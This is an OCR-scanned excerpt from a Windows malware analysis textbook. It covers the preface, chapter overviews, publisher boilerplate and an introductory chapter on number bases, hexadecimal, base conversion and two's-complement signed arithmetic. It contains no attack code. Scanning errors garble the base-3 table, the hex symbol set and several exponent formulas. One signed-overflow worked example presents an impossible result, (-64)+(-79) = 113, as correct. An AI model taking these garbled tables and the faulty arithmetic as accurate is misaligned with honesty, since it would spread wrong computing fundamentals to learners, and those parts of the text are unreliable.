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Preface 


Welcome to Windows Malware Analysis 
Essentials. This book will help you demystify the 
process of analyzing Windows-specific malware, 
and it will show you how to work with the 
weapons in the malware analysts’ arsenal. It will 
also help you develop skills to analyze malware 
on your own with informed confidence. 


Malware is a big and global business—with 
malware fighters a relatively reclusive and closed 
community since the inception of the antivirus 
industry. This also means that anti-malware 
technologies are a relative mystery to most 
regular folk with a dichotomy existing 
perpetually. Only recently have extensive steps 
been taken to alleviate this problem, which is 
becoming more and more visible and pervasive. 
Even gaining knowledge has become an 
expensive affair with training and courses 
running into many thousands of dollars for 
relatively foundational information. The training 
market does have value and an audience, but 
the IT masses do not have much access to it, 
even if the interest is there. Malware has moved 
on from being a sport or hobby to organized 
crime and even though the hacker community 
shares between them, the IT crowd is not very 
initiated or well informed. Skilled manpower is 
required, and right now, demand exceeds supply. 
Working in an anti-malware firm is not the only 
way to fight malware, and with signature-based 
detection slowly becoming an unwieldy 
technology, more minds are required to innovate 
or invent new solutions to existing challenges. 
This has to be a multipronged approach taking 


from data analytics, mathematics, biology, law 
enforcement, and of course, computers, among a 
host of other requirements. Getting up to speed 
with the fundamentals of malware analysis 
makes things more manageable when the 
proverbial stuff hits the fan. 


The book will commence with the essentials of 
computing where you get a foothold for the 
challenges ahead. It will show you how to 
decipher disassembly text obtained from analysis 
of compiled binary code and acclimatize you to 
the battery of tools at your disposal. It will also 
give you an unprecedented look at the myriad 
ways that an analyst can approach analyses of 
real-world malware and points you in the right 
direction in order to start building your own 
malware lab, gathering intelligence, and 
revealing maleficent agents through thorough 
investigation. This book will, as a rite of passage, 
effectively prepare you to be the anti-malware 
warrior you always wanted to be. 


What this book covers 


Chapter 1, Down the Rabbit Hole, prepares you 
for the challenges ahead by reviewing some 
essential computing concepts, which must be 
mastered before you commence analysis of 
malware. You will explore number bases, binary 
arithmetic, and boolean algebra. This chapter 
also covers the malware analysts’ toolkit and 
introduces IDA Pro, the Portable Executable 
format, and instances of reverse engineering 
program binaries on the Windows platform. This 
will set the pace for the activities in the chapters 
ahead. 


Chapter 2, Dancing with the Dead, covers x86 
assembly programming using VC++ 2008 and 
MASM32. You will then proceed with x86 
disassembly of compiled code binary and 
analysis thereof in VC++ IDE. Finally, you will 
explore the myriad configurations in order to do 
assembly programming in the VC++ 
environment and end with a detailed overview of 
common data structures and code constructs in 
the C and x86 assembly. 


Chapter 3, Performing a Séance Session, 
demonstrates a complete end-to-end malware 
analysis of real-world destructive malware. You 
will get unprecedented insight into an analysis 
session along with configurations, tips and tricks, 
and step-by-step progression towards a full 
analysis, right up to signature generation and 
report creation for the entire set of malware 
samples. 


Chapter 4, Traversing Across Parallel Dimensions, 
delves into kernel-mode concepts and the 
fundamentals of Windows internals, which will 


help you with your analysis and understanding of 
the overall framework you are dealing with. You 
will work with IDA Pro and Windbg as the primary 
weapons for kernel mode analysis. 


Chapter 5, Good versus Evil - Ogre Wars, rounds 
off the earlier excursions with a general set of 
devices—from the configuration of the Linux 
virtual machine guest for wiretapping the 
network activity of malware, to exploring XOR 
deobfuscations programmatically. Thereafter, you 
will revisit malware analysis with a different 
target—malicious web scripts, and you will learn 
how the innards are picked one by one, 
gathering information about the exploits used, 
the various infection vectors, dealing with 
obfuscated JavaScript and working with a rather 
familiar set of new tools. You will also be 
introduced to Mandiant Redline for malware 
forensics, and finally end the tour with a 
discussion of bytecode decompilation utilities 
and open source tools for malware intelligence 
gathering. 


What you need for 
this book 


Apart from a working brain (which is not 
optional), you will need: 


e Any x86/x64 PC/Laptop (recent Mac hardware too) which 
is any system you have purchased in the past 5 years 
minimum with a version of Windows XP/7/ 8 or above. 
You can additionally use virtualization software like 
VMWare Fusion/Parallels if you are on MacOS to run the 
examples in Windows OS versions. Please refer to the 
respective software manuals for the installation 
procedures. 


« Some commercial tools that also have free versions from 
the vendor website (for instance IDA Pro). 


e Visual C++ 2008, which is the minimum version you will 
need in order to work with the programming examples 
and exercises in this book. 


e VMWare and VirtualBox, which are two software solutions 
to virtualization that will be instrumental in keeping your 
system safe and completing the malware analysis-specific 
workflows discussed in this book. 


Most of the analysis tools are available as free 
downloads from the links included as they are 
mentioned in the chapters ahead. 


Who this book is for 


This book is best for someone who has interest 
and aptitude for reverse engineering Windows 
executables and wants to specialise in malware 
analysis. Prior experience is recommended but 
not mandatory as the reader is introduced to the 
topic step by step. The book presents the 
malware analysis thought process using a very 
hands-on approach with complete and thorough 
walkthroughs, which will give any analyst 
confidence in approaching this task on their own 
the next time around. 


"Ideally a book would have no order to it, and the 
reader would have to discover his own" - Mark 
Twain. 


Conventions 


In this book, you will find a number of text styles 
that distinguish between different kinds of 
information. Here are some examples of these 
styles and an explanation of their meaning. 


Code words in text, database table names, folder 
names, filenames, file extensions, pathnames, 
dummy URLs, user input, and Twitter handles are 
shown as follows: "Insert your data type of choice 
inside the sizeof() operator." 


A block of code is set as follows: 


#include <stdio.h> 

int main() { 

printf ("%d",sizeof (double) ); 
return 0; 


} 


When we wish to draw your attention to a 
particular part of a code block, the relevant lines 
or items are set in bold: 


mov edi,ds: imp_ printf ; store 
address of printf to edi from imports 

xor esi, esi ;set value of int i=0 
using esi register 


New terms and important words are shown in 
bold. Words that you see on the screen, for 
example, in menus or dialog boxes, appear in the 
text like this: "Clicking the Next button moves 
you to the next screen." 


NOTE 
Warnings or important notes appear in a box like this. 








Reader feedback 


Feedback from our readers is always welcome. 
Let us know what you think about this book— 
what you liked or disliked. Reader feedback is 
important for us as it helps us develop titles that 
you will really get the most out of. 


To send us general feedback, simply e-mail 
<feedback@packtpub. com>, and mention the 
book's title in the subject of your message. 


If there is a topic that you have expertise in and 
you are interested in either writing or 
contributing to a book, see our author guide at 
www.packtpub.com/authors. 


Customer support 


Now that you are the proud owner of a Packt 
book, we have a number of things to help you to 
get the most from your purchase. 


Downloading the example code 


You can download the example code files from 
your account at http://www.packtpub.com for all 
the Packt Publishing books you have purchased. 
If you purchased this book elsewhere, you can 
visit http://www.packtpub.com/support and 
register to have the files e-mailed directly to you. 


Errata 


Although we have taken every care to ensure the 
accuracy of our content, mistakes do happen. If 
you find a mistake in one of our books—maybe a 
mistake in the text or the code—we would be 
grateful if you could report this to us. By doing 
sO, you can Save other readers from frustration 
and help us improve subsequent versions of this 
book. If you find any errata, please report them 
by visiting http://www.packtpub.com/submit- 
errata, selecting your book, clicking on the 
Errata Submission Form link, and entering the 
details of your errata. Once your errata are 
verified, your submission will be accepted and 
the errata will be uploaded to our website or 
added to any list of existing errata under the 
Errata section of that title. 


To view the previously submitted errata, go to 
https://www.packtpub.com/books/content/suppor 
t and enter the name of the book in the search 


field. The required information will appear under 
the Errata section. 


Piracy 


Piracy of copyrighted material on the Internet is 
an ongoing problem across all media. At Packt, 
we take the protection of our copyright and 
licenses very seriously. If you come across any 
illegal copies of our works in any form on the 
Internet, please provide us with the location 
address or website name immediately so that we 
can pursue a remedy. 


Please contact us at <copyright@packtpub. com> 
with a link to the suspected pirated material. 


We appreciate your help in protecting our 
authors and our ability to bring you valuable 
content. 


Questions 


If you have a problem with any aspect of this 
book, you can contact us at 
<questions@packtpub.com>, and we will do our 
best to address the problem. 


Chapter 1. Down the 
Rabbit Hole 


Before we get started with analyzing malware, 
you need to start at the baseline, which will 
involve reviewing some fundamental tenets of 
computer science. Malware analysis essentially 
deals with an in-depth investigation of a 
malicious software program, usually in some 
binary form procured through collection 
channels/repositories/infected systems or even 
your own Frankenstein creations in a lab. In this 
book, we focus on Windows OS malware and the 
myriad methods and the inventory required for 
their analyses. Much like a time and space 
tradeoff for computer algorithms (and the infinite 
monkeys with typewriters paradigm), the analyst 
must be aware that given enough time, any 
sample can be analyzed thoroughly, but due to 
practical constraints, they must be selective in 
their approach so that they can leverage the 
existing solutions to the fullest without 
compromising on the required details. If churning 
out anti-virus signatures for immediate dispersal 
to client systems is the priority, then finding the 
most distinguishing characteristic or feature in 
the sample is a top priority. If network forensics is 
the order of the day, then in-depth packet traces 
and packet analyses must be carried out. If it's a 
memory-resident malware, then malware 
memory forensics has to be dealt with. Likewise, 
in unpacking an armored sample, fixing the 
imports/exports table to get a running 
executable might not be the best use of your 
time, as if the imports are functional in memory 
and the details are available, investigation of the 


Modus Operandi (MO) must be the primary 
focus and not memory carving, particularly if 
time is a factor. Perfectionism in any process has 
its benefits and liabilities. Malware analysis is 
both a science and an art. | believe it is more like 
a craft wherein the tools get the work done if you 
know how to use them creatively, like a sculptor 
who has a set of mundane chisels to remove 
stone chips and etch a figure of fantasy out of it. 
As any artist worth his salt would say, he is still 
learning his craft. 


The primary topics of interest for this primer are 
as follows: 


« Number systems 

- Base conversion 

e Signed numbers and complements 
e Boolean logic and bit masks 

« Malware analysis tools 


- Entropy 


The motivation behind these topics is simple: if 
these fundamentals are not clear, reading hex 
dumps and deciphering assembly code will be a 
pain in the neck. It is vital that you know these 
topics like the back of your hand. More 
importantly, | believe that understanding the 
concepts behind them may help you understand 
computers as a whole more intimately in order to 
deal with more complex problems later on. There 
is no silver bullet for malware analysis 
methodologies as quite a lot of problems that 
surface are related to computing boundaries and 
are NP-complete, much like an irreversible 
chemical process or an intractable problem. You 
will be using debuggers, disassemblers, 
monitoring software, visualization, data science, 
machine learning, regular expressions 
(automata), automation, virtualization, system 


administration, the software development tool 
chain and system APIs, and so on. Thus, you 
have a set of tools that enable you to peek into 
the coexisting layers and a set of techniques that 
enable you to use these tools to an optimum 
level. Also, you have to wear many hats—things 
like forensics, penetration testing, reverse 
engineering, and exploit research blur the line 
when it comes to malware technologies that are 
in vogue, and you have to keep up. The rest 
comes with experience and tons of practice 
(10,000 hours to mastery according to Outliers 
by Malcolm Gladwell). There is no shortcut to 
hard work, and shortcuts can be dangerous, 
which ironically is learned from experience many 
times. The primer will be quick, and it will be 
assumed that you have a solid understanding of 
the topics discussed before you read the 
following chapters, particularly x86/x64 assembly 
and disassembly. From here, you will proceed to 
x86/x64 assembly programming and analysis, 
static and dynamic malware analysis, 
virtualization, and analysis of various malware 
vectors. 


Number systems 


The number system is a notational scheme that 
deals with using a symbol to represent a 
quantity. 


A point to ponder: We know that a quantity can 
be both finite and infinite. In the real world, many 
things around us are quantifiable and can be 
accounted for. Trees in a garden are finite. The 
population of a country is finite. In contrast, sand 
particles are seemingly infinite (by being 
intractable and ubiquitous). Star systems are 
seemingly infinite (by observation). Prime 


number sequences are infinite (by conjecture). It 
is also understood that tangible and intangible 
things exist in nature in both finite and infinite 
states. A finite entity can be made infinite just by 
endless replication. An infinite and intangible 
entity can be harnessed as a finite unit by giving 
it aname and identity. Can you think of some 
examples in this universe (for example, is this 
one of many universes or is it the only one and 
infinitely expanding)? 


In my experience, there is a lot of confusion 
regarding number systems, even with some 
experienced IT folk. Quantities and the 
representation of these quantities such as 
symbols/notations are primarily separate entities. 
A notation system and what it represents are 
completely different things, although because of 
ubiquity and visibility, the meanings are 
exchanged and we take it for granted that they 
are both one and the same, and that creates the 
confusion. We normally count using our fingers 
because it seems natural to us. We have five 
digits per hand and they can be utilized to count 
up to 10 units. So, we developed a decimal 
counting system. Note that the numbers 0 to 9 
constitute the whole symbol set for whole 
numbers. While defining a symbol set, although 
we use the symbols that are designed through 
the centuries that have passed and have their 
place, it is not mandatory to define numbers only 
in that particular set. Nothing prevents us from 
developing our own symbol set to notate 
quantities. 


An example symbol set = { NULL, ALPHA, TWIN, 
TRIPOD, TABLE}, and we can substitute pictures 
in the above set, which directly map to {0, 1, 2, 
3, 4}. Can you think of your own symbol set? 


The largest number in the symbol set (9) is one 
less than that of the base (10). Also, zero was a 
relatively late addition, with many cultures not 
realizing that null or nothing can also be 
symbolized. Using zero in a number system is 
the crux to developing a position-based encoding 
scheme. You can only occupy something where 
there is a void that acts as a container, so to 
speak. So, you can think of 0 as a container for 
symbols and as a placeholder for new positions. 
In order to count 10 objects, we reuse the first 
two symbols from the symbol set {0, 1, 2, 3, 4, 
5, 6, 7, 8, 9}. This is key to understanding 
number systems in vogue. What happens is that 
each number position/column is taken as an 
accumulator. You start at your right and move 
towards the left. The value in the first column 
changes in place as long as the symbol set has a 
symbol for it. 


When the maximum value is achieved, a new 
column toward the left is taken and the counting 
continues with the initial symbols in the symbol 
set. Thus, think of each column as a bucket that 
is a larger bucket than the one to the right of it. 
Further, each new column represents the largest 
quantity of the last column. Here, the number of 
columns used or the number of symbol places 
denotes the range of quantities that can be 
represented. We can only use the symbols in the 
symbol set. Thus, if we had a set of infinite 
symbols for each quantity, we would not have to 
reuse the symbols to represent larger quantities, 
but that would be very unwieldy as we humans 
don't have a very good memory span. 


To reiterate, think of the columns as containers. 
Once you are out of symbols for that particular 
column, you reuse the first symbol greater than 
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You can also look at the number system notation 
as a histogram-based notation that uses symbols 
instead of rectangles, wherein the quantity is 
represented by the total count in a compact 
representation. The histogram is essentially a 
statistical tool to find the percentage of an entity 
or a group of entities and other control points 
such as features of the entities in a population 
that contains the entities. 


Think of it as a frequency count of a particular 
entity. Here, each entity refers to the base power 
group that each digit towards the left represents. 


So, taken as a Summation of weights, each 
position that can be seen as representing a total 
Frequency Count of how many of that position's 
relative quantity. Instead of drawing 15 lines to 
denote 15 objects, we use the symbols 1 and 5 
to denote 5 objects and 10 more, with 5 joining 
the 1 and then taking the place of 0, which acts 
as a container or placeholder to give the 
combined notation of 15. 


For a larger number such as 476, you can see 
this notation as a count of how many 100s, 10s, 
and the core symbol set values. So, 400 = 4 * 
100 or there are 4 hundreds, and 7 * 10 or that 
there are 7 tens and 6 values more. The reason 
you add these up is because they each represent 
a part of the total. 


Can you repeat the process with a new base? 
Why don't you try base 3? The solution will be 
given later in this chapter, but you must try it 
yourself first. 


Have you ever wondered why the base 8 (octal) 
does not have the numbers 8 and above in its 
notation? Use the same rules that you have just 


read to reason why this notation system works 
the way it does. It follows the same number 
symbol-based position-relative notation. You can 
also think of this as weights being attached to 
the positions as they are positioned towards the 
left. Finally, as each row signifies a count of the 
next quantity, you essentially sum up all the 
position values according to their weights. 


We are accustomed to using the above formula 
as an automated response for counting numbers 
without ever giving much thought to the 
reasoning behind this notational system. It's 
taken for granted that you never question it. 


The hexadecimal base notation also works in the 
same way. The reasoning behind using 16 asa 
quantity belies the fact that a permutation of 2 
symbols { 0, 1} to a length of 4 gives us 16 
different patterns. Since 4 bits used as a basic 
block works for grouping bit sequences as per 
engineering conventions, the nibble is the 
smallest block unit in computing. The bit is the 
smallest individual unit present. The minimum 
value is 0000 and the largest value is 1111. 
These unique patterns are represented using 
symbols from the alphabet and the numbers 0 to 
9. 


You can replace the alphabet symbols A to F with 
any shape, picture, pattern, Greek letter, or 
visual glyph. It's just that the alphabets are 
already a part of our communication framework, 
so it makes sense to reuse them. So, the 
convention of grouping 4 bits to form a pattern 
using a notation that expresses the same thing 
provides a much more convenient way to look at 
binary information. Since our visual acuity is 
much sharper when we form groups and 


patterns, this system works for engineers and 
analysts, who need to work with binary data (in a 
domain-agnostic manner) on a regular basis. 
Note that as per convention, hexadecimal values 
are prefixed with Ox or post-fixed with H to 
denote hexadecimal notation. 


The hexadecimal symbol set = {0, 1, 2, 3, 4, 5, 
6, 7, 8, 9, A, B, Gg DE E F} 





List of 16 values from 0 and 1 symbols: 


Symbol set {0,1}, notation length=4 
0000=0x0 
0001=0x1 
0010=0x2 
0011=0x3 
0100=0x4 
0101=0x5 
0110=0x6 
0111=0x7 
1000=0x8 
1001=0x9 
1010=0xA 
1011=0xB 
1100=0xC 
1101=0xD 
1110=0xE 
1111=0xF 








Permutations are also the foundational 
mathematics behind data type representation. 
So, we have taken 4 bits to form a nibble and 8 
bits to form a byte. What is a byte? Taken simply, 
it is a series of symbols from the set {0, 1} toa 
length of 8, which represents the permutated 
value of that particular sequence as a quantity. It 
could also be further used to represent a packed 


data type where each bit position denotes a 
toggle of a value as on or off, similar to an array 
of switches. Since we work with programming 
languages, the binary data types are of a primary 
interest as they work like an index into a table 
where the entire range from the minimum to the 
maximum is already worked out as part of a finite 
series. Thus, the bit pattern 00001111 gives the 
value of 15 out of a total of 2* 8 values. Why 

2* 8? This is because when you need to compute 
unique values out of a symbol set to a specific 
length, you take the total number of symbols to 
the power of the length to get the maximum 
value. However, you also have to take into 
account the primary conditions for 
permutations and its difference from 
combinations all relating to symbol usage and 
being ordered or not. As a rule, to reuse the 
symbols in a specific order, you can take powers, 
as in the case of permutations. However, if using 
a symbol removes it from the participation of the 
next position's symbol set, you need to take 
factorials, as in the case of combinations. They all 
fall into a branch of mathematics called 
Combinatorics. Likewise, do you see the logic 
behind primitive data types such as int, short, 
char, and float? When using custom data types, 
such as structs and classes, you are effectively 
setting up a binary data structure to denote a 
specific data type that could be a combination of 
primitive data types or user-defined ones. Since 
the symbol set is the same for both 
primitive/primary and data types, it is the length 
of the data structure assigned per data type that 
gives meaning to the structure. 


For a simple exercise, find the unique ways in 
which you can arrange the letters {A, B, C}, 
where each symbol can be reused to a length of 


3, that is, each position can use any symbol from 
the set above. Thereafter, find the unique ways 
in which you can combine the symbols, without 
repeating any previous pattern but in any 
sequence. You will find that you get 27 patterns 
from the first exercise and 6 patterns from the 
second. Now, build a formula or try to model this 
pattern. You get (base~ (pattern length)) and 
factorial (base). This is how binary notation is 
used to encode quantities, which are being 
denoted by symbols (which can also be mapped 
to a scheme), which in turn are based on the 
principles of human language, and therefore, all 
information can be encoded in this manner. 


Computers do not even understand the symbol 1 
(ASCII 0x31) and the symbol 0 (ASCII 0x30). 
They only work with voltage levels and logic 
gates as well as combined and sequential circuits 
such as D flip-flops for memory. This complex 
dance is orchestrated by a clock that sets things 
in motion (a regular pulse of n cycles/s aids in 
encoding schemes, in much the same way as in 
music, the rhythm brings predictability and 
stability that greatly simplifies 
encoding/decoding and transmission); much like 
a conductor, in tandem with the microprocessor, 
which provides built-in instructions that can be 
used to implement the algorithm given to it. The 
primary purpose of using various notation 
systems is that doing so makes it more 
manageable for us to work with circuit-based 
logic and provides an interface that looks familiar 
so that humans can communicate with the 
machine. It's all just various layers of abstraction. 


The following table shows how the base 3 
notation scheme can be worked out: 





Base 3 Notation: 

Symbol set = {0,1,2} 

0 

{1 

2=2 

3=10 

4z11 

5212 

6=20 

7221 

8=22 

92100 

10=101 

As a system of positional weights; 
1°3'240°31 +13 "0+=10 

Asa histogram sigma of each column: 


Ist column symbol=0, That means the number of singular units till the maximum number of symbols in 
the set has been crossed-so the count at this point is at least 3, Note that 0,1 and 2 are the symbols 
exhausted for this count. If the number of units were 2, this column would contain 2 and there would be 
no 2nd column. 


2nd column to the left symbol=1. That means that the number of units have exceeded the symbol set 
count till 2 units and now, the zero placeholder is used to denote the 3rd unit in count, with the zero in the 
Ist column signifying that it is ready to accumulate increments till the 2nd column is also exhausted. 
After this both will reset to zero and the 3rd column gets active. 


So looking at the symbol 10, its a count of the column value and how much it represents, The count 
therefore is 3, 





Can you write a program to display the base 
notation of bases from 2 to 16? A maximum of 
base 36 is possible by using alphabets and 
numbers as the symbol set after which new 
symbols or combinations of existing symbols 
have to be used to map a new symbol set. | think 





that this would be a great exercise in 
programming fundamentals. 


Base conversion 


You have seen how the positional notation 
system is used to represent quantities. How do 
you work with the myriad bases that are 
developed from this scheme? Converting decimal 
to binary and binary to hexadecimal or vice versa 
in any combination must be a workable task in 
order to successfully make use of the logic 
framework and communicate with the system. 


BINARY TO HEXADECIMAL (AND 
VICE VERSA) 


This is the simplest base conversion method 
once you get the hang of it. Each hexadecimal 
digit maps directly to a specific binary pattern. 
Dividing any binary pattern into multiples of 4 
gives us the corresponding hexadecimal form. If 
less than 4 bits are used, 0 is left padded (for 
instance, 11 0011 0101 gets left padded to 0011 
0011 0101 in order to get 3 nibbles) to get it to 
4 bits or a multiple length thereof. Likewise, for 
larger lengths but ending at odd positions, zero 
is padded again to get the length of a multiple of 
4. Remember that each character in the 
hexadecimal representation is a nibble. Hence, 
larger composite data types are grouped 
according to the data type length. WORD has 2 
bytes, and DWORD has 4 bytes. These terms 
relate to data types or for our purposes, the 
number of bits used to collectively represent a 
unit of data—exhibiting properties of the total 
pattern quantity count and the placeholders for 
each of the individual patterns. These directly 
map to a value in the data type range; for 
instance, a pattern length of 16 bits is 


conventionally called a WORD, which gives a 
total pattern value count of 2* 16 values, and the 
value 2, for instance, can be represented in 16 
bits as 0000 0000 0000 0010, which directly 
maps to the value 2 from a range of 0 to 65,535. 
The processor WORD is normally the most 
fundamental data unit that is used in the 
processor architecture. In JA-32, the natural or 
processor word is taken as 32-bit units and 
other data types derived from it. It can also 
conventionally mean the type of an integer 
implemented in the architecture. Refer to 
https://en.wikipedia.org/wiki/Word_(computer_arc 
hitecture) for a more general overview. Similarly, 
for any hexadecimal number, just map each of its 
characters to the 16 different binary values and 
concatenate them in order to get the resulting 
binary sequence. 


1111 1101 <-> FDh[byte data type] 


DECIMAL TO BINARY (AND VICE 
VERSA) 


Binary to decimal is achieved by adding the 
weights for each bit position that is set and 
adding them up. 


Decimal to binary requires you to divide the 
number by 2 and set the symbol for any 
remainder and O for no remainder after every 
step, and recursively do the division till you get 
to 2 or below as the dividend. Essentially, you 
take stock of the modulus of the entire process in 
a stack data structure and concatenate them in 
reverse to get the resulting binary value. 


For instance, to convert 9 decimal to binary, 
notice the modulus or remainder: 


e 9/2 = 4 with remainder 1 


e 4/2 = 2 with remainder 0 
e 2/2 = 1 with remainder 0 


e ¥% = 0 with remainder 1 


Reading in reverse, that is, bottom to top, we get 
1001, which if you multiply the places in powers 
of 8 would yield 17*2*34+ 04 04 1*2°1=8+ 

= 9. Mapping 1001 to hexadecimals will still 
give you Ox9 as after that, the symbol set for 
quantities above 9 is letters. 


The divisions by base till you reach the base 
value and record the modulus method as well as 
the add the integer powers of the base to get the 
result method are the most prevalent in 
computing and work with every base that 
subscribes to this positional notational system. 


Try doing converting decimal values to 
hexadecimals (Hint: Divide by 16 and take the 
modulus/add the powers of each hexadecimal 
character decimal value (nibble representation) 
and multiply with each power of 16.). 


OCTAL BASE CONVERSION 


Octal is a legacy form and is not used much 
nowadays in our current technological setup. 
However, now, you know how to deal with it. The 
simple way to break a binary pattern into its octal 
representation is to group the bits into groups of 
three and write the decimal number for that 
pattern. Why 3 you ask? It is octal, so 8 is the 
base of the notation. Taking a binary of length 3 
and setting each bit position to 1 each to get 
111 gives us 7 in decimal. This is the maximum 
value that will be represented by the symbol set 
(remember how the positional/placeholder-based 
notation works). Thus, number symbol patterns 
of a length of 3 places are enough to realize the 





Signed numbers and 
complements 


An annoying topic for many is negative numbers. 
Their representation in binary is a set of 
workaround techniques to represent negative 
numbers with the same data types and symbol 
set. How would you differentiate the values in 
that scenario? A binary pattern is by itself quite 
neutral to begin with. It is a representation of a 
sequence of symbols that have two possible 
values from the symbol set, which have a final 
resulting value based on a particular permutation 
pattern that denotes this value. In essence, the 
binary pattern could be a number, a picture, a 
text file, a video file, or so on. What a pattern 
constitutes is also dependent on who looks at it 
and how. Inherently, the pattern is quite 
ambiguous without a context to give it its 
definite meaning. Hence, in terms of compiled 
machine code, which we will dealing with, the 
way the instructions and their opcodes are 
chosen by the compiler build a context around 
the regular data type, for instance, a DWORD, 
which is 32 bits long, or a WORD, which is 16 
bits long. This sort of structure prevents 
ambiguity for the translation mechanisms in 
place. You will learn ahead in assembly 
programming that the compiler will choose 
certain instructions based on its inferred data 
type. Thus, context is supported by design. JAE 
and JGE is some examples using analogous 
instructions, where the value for the first 
instruction mnemonic denotes the use of 
unsigned numbers, whereas the second 


instruction mnemonic denotes the use of signed 
numbers. 





MSB LSB 


Sign bit for signed byte data type 








Signed data types will effectively halve the range 
of the unsigned data type version. This is 
because of the use of the sign bit as the Most 
Significant Bit (MSB). The binary values that 
will be represented will use 7 bits, which is 2” 7 
for a signed byte and 2” 31 for a signed DWORD. 
The largest positive value will be (2*(n-1)-1). So, 
for a byte, the largest positive value will be 2” 7 - 
1 = 127. However, the largest negative value will 
be -128. In binary patterns, since each position is 
a power of 2, using one less bit toward the left 
(direction of increment) will result in using half of 
the value (shift left is multiplication by 2 and 
shift right is division by 2). Now, anytime, you 
see the familiar formula of (2“n - 1), you know 
that it is essentially the maximum value of that 
data type (n bits), which is the last value in the 
permutation chain. 2™n will represent the total 
number of values that you can use including 
zero. You will see this formula in lots of 
computing areas, including the area of finding 
large prime numbers, which is an active area of 
research. 


The main methods used are sign and magnitude, 
where the MSB is set to denote negative 
numbers and 1's complement and 2's 
complement where the complement is taken by 
inverting the value (1's complement, NOT x86 
instruction) and adding 1 to the result to get the 
2's complement (NEG x86 instruction). Is 
OXFFFFFFFF = ((2~32)-1) or is it -1? You can 
check your debugger (in-depth introduction later) 
to see whether the data type is unsigned 
(positive) or the type is signed (negative and 
positive). Note from the table below that zero has 
some redundancy as is represented by multiple 
symbols in a couple of methods. 


For our purposes and keeping in mind the C data 
types, the data type char equals 1 byte, short 
equals 2 bytes, Long equals 4 bytes, double 
equals 8 bytes, sbyte is still a byte (8 bits) with 
the data range effectively halved, and the MSB 
now represents the minus sign; int equals 4 
bytes, word equals 2 bytes, dword equals 4 
bytes, and qword equals 8 bytes. 


For the C types, you can write a simple program 
with the lines: 


#include <stdio.h> 

int main() { 

printf ("%d",sizeof (double) ); 
return 0; 


- 


Insert your data type of choice inside the 
sizeof() operator. 
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Binary addition and subtraction of unsigned 
numbers is another curious segment. When you 
add 1+ 1 in decimal, you have the symbol 2 to 
denote two entities or objects or values, so you 
can write 2 to the result. However, in binary, the 
symbol set is similar to decimals only for the 2 
values { 0, 1}. Hence, to represent larger 
quantities, you displace the same symbols 
toward the left to symbolize that quantity. Binary 
does not use the decimal range, so 2 in binary 
will be 10, which is not the decimal 10. Is 1+ 1 
+ 1 = 3? That would be wrong in binary terms 
because there is no symbol for 3 in binary even if 
the quantity 3 can be represented validly. So, the 





resulting value will be the binary symbol 
sequence 11 and not decimal 11. 


Signed numbers have to deal with carry in and 
carry out comparisons of the MSB position to 
check for overflow conditions. If the carry in value 
is the same as the carry out value, there is no 
overflow; however, if there is a discrepancy, there 
is an overflow. This is essential for the proper 
representation of signed data types and addition 
and subtraction between these types. This is a 
simple XOR (please read more on gates in the 
sections later on in this chapter) such as 
comparison for internal circuitry, which is a much 
more streamlined affair than the other error- 
checking solutions. There is an area in the 
microprocessor to check for conditions such as 
this during calculations: the EFLAGS register and 
the OF or Overflow Flag bit, which is set 
whenever there is an overflow. 


A signed data type overflow 
conditions table 


Let us delve into signed data types and overflow 
conditions, which can be perused succinctly in 
the following table: 
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If there is a carry out at the MSB with no carry in, 
then there is an overflow. If there is a carry in to 
the MSB with no carry out, there is an overflow. 





For instance: 


(-7) +(-7) = -14 
11111001 
11111001= 

(1)1111 0010 


The carry that was getting into the MSB was (1 + 
1+ 1=11, S01 as carry). 


The carry out is 1 as well, which will be 
discarded. However, they are both the same so 
there has been no overflow and the result is valid 
as negative 14. You can check it as NOT (bitwise 
inversion) (11110010) = 13 (0000 1101), and 
add 1 to get 14. It's the 2's complement of 14. 
Since the MSB is set, the number is a signed 
data type negative number, which adheres to the 
representation requirements. 


Take another example: 


1100 0000 (192) 
1011 0001 # (177) (+) = 
(1)0111 0001 


This evaluates to 369, which is larger than the 
data type range of a byte, which is 256. Hence, 
we can assume that taking the numbers as 
unsigned is an error. 


However, if we take the type as the signed type: 
e The binary pattern is a 2's complement of 64 decimals as 
[NOT (1100 0000) +1] = 64 


e« The second number is also taken as a 2's complement of 
79 [NOT(1011 0001) + 1] = 79 


Taken as signed numbers, we get the correct value as 
(-64) + (-79) = 113, a positive signed number 


- As a signed type, the byte will have 127 as the largest 
positive number and -128 as the largest negative number 


Remember that a rollover effect happens if the 
largest number on either side is reached during 
the increment. To reach 127 as the largest 
permissible value in a byte, 63 units are required 
to be added. After that, from -128 onward, the 
range is traversed backward toward 0 at the 
center of the signed range number line. From 79, 
subtract 63 to get 16 units of increments 
remaining. Go back that many steps from -128 to 
reach -113. This is the correct answer within the 
range. 


This same process occurs for larger signed data 
types as well as for byte lengths such as WORD, 
DWORD, and QWORD. 


A better way to understand negative 
representation is the simple mathematical result 
of adding a positive and a negative number of 
the same magnitude. 5 + (-5) = 0. So, you can 
ask the question: what number when added to a 
positive number gives 0? This will be key to 
understanding the negative number 
representation and its myriad forms of optimized 
notation systems, and their pros and cons. 


Say, we take the decimal 5 and convert it to its 
binary notation, 0101. 





0101 (Minuend) 
+722? (Subtrahend) = 
0000 (Difference) 





STEP 1: 
0101 
+m 1 = 


0 (with 1 carry for 10) 





STEP 2: 


0101 (1 previous carry) 
+211 = 


00 (1 new carry for 10) 





Ser 3: 

0101 (1 old carry +1 =10) 
+2011 = 

000 (1 new carry for 10) 





STEP 4: 
0101 

+ 1011 = 

(1) 0000 

















The 1 that is carried at the end is discarded as 
the requisite value is already obtained and is an 
overflow for the current data type that can be 
taken as a disposable artifact for our purposes. 


So, we get 1011 as negative 5 as a result. As a 
positive number, the value is 11. However that is 
only for the unsigned data type. For signed 


types, the type data ranges are bifurcated into 
two parts: positive and negative bit patterns. 
Note another feature of this result. If you remove 
1 from the LSB, you essentially get the 1's 
complement of the original value. 5 = 0101 and 
the (result - 1) = 1010. Does that look like an 
inversion? Yes, it does. Now, the final result itself 
is the 1's complement plus 1. If you look at the 
bit patterns, you essentially are doing a NOT 
operation and a (NOT + 1) operation. x86 
microprocessors provide instructions that can 
work at a bitwise level with NOT and NEG 
instructions. So now, negative values can be 
computed and represented logically instead of 
numerically for every number that falls within the 
range of a data type. However, 2's complement 
is the best method currently as 1 does not have 
to be added and subtraction is simpler, as well as 
not dealing with positive and negative zeroes. 
This saves CPU time and additional circuitry 
design specifically for negative numbers, so the 
benefit of using the same addition circuitry (ALU) 
for both addition and subtraction (negation and 
addition) is very evident. 


We will delve more into other number 
representation schemes (real numbers/fixed and 
floating point numbers), BCD, assembly 
programming, deciphering disassembly, and 
